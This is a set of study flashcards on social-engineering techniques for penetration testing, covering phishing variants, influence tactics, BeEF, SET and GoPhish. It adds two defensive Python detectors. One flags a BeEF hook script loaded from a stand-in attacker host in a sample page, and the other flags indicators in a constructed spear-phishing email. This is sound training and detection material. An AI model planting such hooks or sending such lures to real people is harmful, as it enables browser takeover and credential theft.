Chapter 6 Social Engineering
Using flattery or physical attractiveness to lure a target into doing something.
Likeness
Identify your targets from the ________ for phishing.
Rules of Engagement (RoE)
is a technique used to capitalize on a target's trust relationship with websites they commonly visit. This strategy targets a particular group, where an attacker observes websites the group frequents on a regular basis and infects one of the sites with malware.
Waterholing
Used to create a feeling of urgency to influence one's decision-making logic. False statements can be used to persuade someone to do something because it sounds important and there is little time to act, such as "This sale ends today. Act now before it's too late!"
Scarcity
There are a number of mitigations organizations can use to thwart risks associated with social engineering attacks, including:
• Security training
• Fine-tuning technological controls
• Active defense (intrusion detection and prevention systems) and security monitoring (e.g., cameras covering the dumpsters to deter dumpster diving)
• Shredders for sensitive information (e.g., papers, CDs, etc.)
• Organizational policy for handling sensitive information
• Annual testing that can help prepare organizations for various types of phishing attacks
The page will have an embedded JavaScript tag that will load the BeEF JavaScript code ________ to hook the browser into the framework.
(hook.js)
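The hook works because the victim page carries a script tag that loads hook.js from the attacker's BeEF server (port 3000 by default). The following is an added example, not code from the original page or from the BeEF project: it parses a constructed sample page, lists every script loaded from a host outside an assumed allowlist, and flags the ones whose path ends in /hook.js. The host name attacker.example and the allowlist are assumptions for this example.

```python
"""Added example (not from the original page or from BeEF): find <script>
tags that pull JavaScript from a foreign origin, the way a BeEF hook tag does.

Assumptions: the hook host "attacker.example", the allowlist below and the
sample HTML are constructed for illustration; port 3000 and /hook.js are
BeEF's defaults.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of a compromised page: the last script tag is the hook.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
<script src="http://attacker.example:3000/hook.js"></script>
</head><body>Hello</body></html>"""

# Hosts the site legitimately loads script from (assumed allowlist).
ALLOWED_HOSTS = {"cdn.example.com"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in the document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def find_foreign_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return script URLs served from a host that is neither relative
    (same origin as the page) nor in the allowlist. A BeEF hook lands here."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    suspicious = []
    for src in parser.sources:
        host = urlparse(src).hostname  # None for relative URLs
        if host is None:
            continue
        if host.lower() not in allowed_hosts:
            suspicious.append(src)
    return suspicious


def looks_like_beef_hook(url):
    """Heuristic: BeEF serves its hook as /hook.js (port 3000 by default).
    An attacker can rename it, so treat this as a hint, not proof."""
    return urlparse(url).path.endswith("/hook.js")


if __name__ == "__main__":
    for url in find_foreign_scripts(SAMPLE_PAGE):
        tag = " (BeEF hook?)" if looks_like_beef_hook(url) else ""
        print(f"foreign script: {url}{tag}")
```

The allowlist comparison is the part that generalizes: a renamed hook still shows up as a script from an origin the site never intended to load from, which is also why a Content-Security-Policy with a tight script-src blocks the hook outright.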
It is important to ensure that any type of social engineering attack used within a pentest is covered in the ____1____ and approved in the __2__ prior to execution.
1. statement of work (SOW) 2. rules of engagement (RoE)
the first objective of the invading force. In the context of computer security testing or adversarial cyber-attacks, the beachhead would be the point of presence behind the security perimeter (e.g., external firewall) that could be used to launch attacks in an effort to advance further into the target network.
A beachhead
focuses on sending out high volumes of emails that appear to be legitimate in nature: "50% off at Best Buy, click the link to order now!"
A phishing campaign
Can be performed in a legal (impersonating an officer of the law), organizational (impersonating a business leadership official), or social (dominant figure in a group of one's peers) leadership role to gain access to property or controlled information.
Authority
The Social Engineering Framework (https://www.social-engineer.org) provides definitions and examples for each type of influential tactic:
Authority, Scarcity, Social Proof, Likeness, Fear
a procedure used to lure a target into doing something using a tangible reward. An example would be dropping a USB device or CD labeled "company financial data." The idea is to spark the curiosity of the target and persuade him or her to insert the device and open a seemingly harmless file, which could really be malware or ransomware.
Baiting
which is also installed in Kali Linux, stands for the Browser Exploitation Framework and focuses on client-side attacks against web browsers.
BeEF (Browser Exploitation Framework)
another social engineering method used to retrieve sensitive information from an organization's dumpster/trash in order to attack the computer network. The objective is to find sensitive information that may or may not have been shredded such as usernames, passwords, software, account information, financial statements, meeting notes, etc.
Dumpster diving
This approach attempts to strike fear into the target. An example would be using malware (scareware) to influence someone's decision to purchase or download fake antivirus programs or other software with malicious intent.
Fear
is a phishing framework used to test an organization's exposure to phishing. You can create phishing templates, target lists, and track results in an online dashboard. Pentesters can use this type of framework to test and evaluate phishing methods in a controlled environment.
GoPhish
is the process of asking questions to get answers about specific topics.
Interrogation
Pentesters can be hired to run phishing attack vectors to evaluate technical defense measures on the network, like spam filters for email, web content filters, firewalls, and other types of access control devices. Such engagements also help validate employee behavior patterns in reporting and responding to the threat, and serve as a controlled compromise method to gain an initial foothold into an organization's network. Phishing is accomplished using telephone- and email-based attacks.
Phishing
This is a fraud technique delivered through email, phone, or text message and used to obtain sensitive information from the target. It is one of the most popular methods used for social engineering.
Phishing
is a technique used to fabricate scenarios. During disastrous situations, either manmade (large data breaches) or due to Mother Nature (hurricanes, earthquakes, etc.), attackers will try to take advantage of the situation. If a large company gets hacked and personal and financial information is compromised, attackers may prey on the victims of the attack and fabricate a story offering credit monitoring services for a nominal fee.
Pretexting (a pretext for short)
attacks can deliver malware or a URL of a malicious website. Attackers may use different motivational techniques like scarcity or fear to entice the victim to click on the link. SMS messages can be fabricated and delivered using a special SMS phishing application, and an automated recording can deliver standardized messages to a target audience. SMS messages can also be used to entice a user to call a 1-900 (premium-rate) number or to reply with personal information.
SMS Phishing
Two common types of phishing attacks, facilitated over telecommunication networks, are known as ______ and ______. Attackers (or scammers) are typically motivated by financial gain. Each method supports automation, which can help deliver scams and unsolicited messages to a wide range of targets with little effort.
SMS phishing and voice phishing (or vishing)
Attackers have created programs that run in the background and mimic the Microsoft Windows blue screen of death, and have gone as far as using ransomware, where the malicious program encrypts the contents of the victim's hard drive and forces the user to pay a ransom to decrypt them.
Scareware
an observation technique where an attacker pretends to do something else while instead observing what a target is doing, such as typing in a password.
Shoulder surfing
This is a social phenomenon describing the kind of conformity that causes an outsider to follow a group's behavior. It can also describe the inability to determine appropriate behavior in an unfamiliar situation, which leads a person to follow the actions of someone else who sounds like he knows what he is saying: the "everyone is doing it" effect.
Social Proof
This approach is selective, such that only a choice number of targets are identified for the attack. Targets are solicited through an email-spoofing attack from what looks to be a legitimate source. The email could have a link or document (e.g., a macro-embedded Word file that carries and executes malware) inside, which encourages the user to click on it.
Spear phishing
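The phishing and spear phishing cards above list the ingredients of such an email: a spoofed sender, a link that looks legitimate, and a macro-embedded document. The following is an added example, not code from the original page or from any tool it mentions: it triages a constructed raw email for those three indicators (From domain disagreeing with Return-Path/Reply-To, anchor text that shows one host while the href points to another, and a macro-enabled Office attachment). Every header, domain and file name in the sample is constructed for the example; the list of macro-enabled extensions is an assumption you should extend for your environment.

```python
"""Added example (not from the original page): triage a raw email for the
spear-phishing indicators the text describes. All headers, domains and file
names below are constructed; nothing here is real traffic."""
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: From: claims the corporate domain, Return-Path and
# Reply-To point elsewhere, the link text lies about its destination, and a
# macro-enabled Word file (.docm) is attached.
SAMPLE_EMAIL = """\
Return-Path: <billing@corp-example-invoices.net>
From: "Jane Doe, Accounts Payable" <jane.doe@corp.example>
Reply-To: billing@corp-example-invoices.net
To: victim@corp.example
Subject: Overdue invoice - action required today
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/html; charset="utf-8"

<p>Please review the attached invoice or view it online at
<a href="http://corp-example-invoices.net/login">https://portal.corp.example/invoices</a></p>

--B1
Content-Type: application/octet-stream; name="Invoice_4471.docm"
Content-Disposition: attachment; filename="Invoice_4471.docm"
Content-Transfer-Encoding: base64

UEsDBBQABgAIAAAAIQA=
--B1--
"""

# Assumed list of macro-enabled Office extensions; extend as needed.
MACRO_EXTENSIONS = (".docm", ".xlsm", ".pptm", ".dotm", ".xlam")


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> tag."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def domain_of(addr):
    """Lowercased domain part of an RFC 5322 address ('' if absent)."""
    _, email_addr = parseaddr(addr or "")
    return email_addr.rsplit("@", 1)[-1].lower() if "@" in email_addr else ""


def phishing_indicators(raw):
    """Return human-readable indicators found in one raw RFC 822 message."""
    msg = message_from_string(raw)
    findings = []

    # 1. Sender spoofing: reply/bounce addresses that leave the From domain.
    from_dom = domain_of(msg["From"])
    for hdr in ("Return-Path", "Reply-To"):
        if msg[hdr] and domain_of(msg[hdr]) != from_dom:
            findings.append(f"{hdr} domain {domain_of(msg[hdr])} != From domain {from_dom}")

    for part in msg.walk():
        filename = part.get_filename()
        # 2. Macro-enabled document carried as an attachment.
        if filename and filename.lower().endswith(MACRO_EXTENSIONS):
            findings.append(f"macro-enabled attachment {filename}")
        # 3. Link whose visible URL names a different host than its href.
        elif part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            html = part.get_payload(decode=True).decode(charset, "replace")
            collector = LinkCollector()
            collector.feed(html)
            for href, text in collector.links:
                if re.match(r"https?://", text):
                    shown, real = urlparse(text).hostname, urlparse(href).hostname
                    if shown != real:
                        findings.append(f"link text shows {shown} but points to {real}")
    return findings


if __name__ == "__main__":
    for finding in phishing_indicators(SAMPLE_EMAIL):
        print("indicator:", finding)
```

None of these checks is proof on its own (mailing lists legitimately rewrite Reply-To, for instance), which is why the function returns all indicators rather than a verdict; the same logic run over a mailbox export is a cheap way to measure how many lures from a controlled phishing exercise would have been caught by a filter.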
is a Python-based framework installed by default in Kali Linux that helps pentesters carry out phishing exercises. The phishing attacks it supports use email to deliver the social engineering message, with the email content and embedded URLs luring the target into clicking on a link.
The Social-Engineer Toolkit (SET)
is also a spoofed-email attack that is used to target members of an organization with credentials and access to resources that could cause catastrophic damage to a business if compromised. Emails could be fabricated with legal issues, executive issues, or even unsatisfactory comments from a customer.
Whaling
The purpose of social engineering is to extract meaningful information from a target. This process is known as
elicitation
using a verbal pretext to elicit sensitive information from a target. The goals may be to entice someone to provide an unpublished phone number, the name of an authority or vendor, details about operational procedures, or even to click on a link or open an e-mail through phone-based reinforcement.
voice phishing, aka "vishing"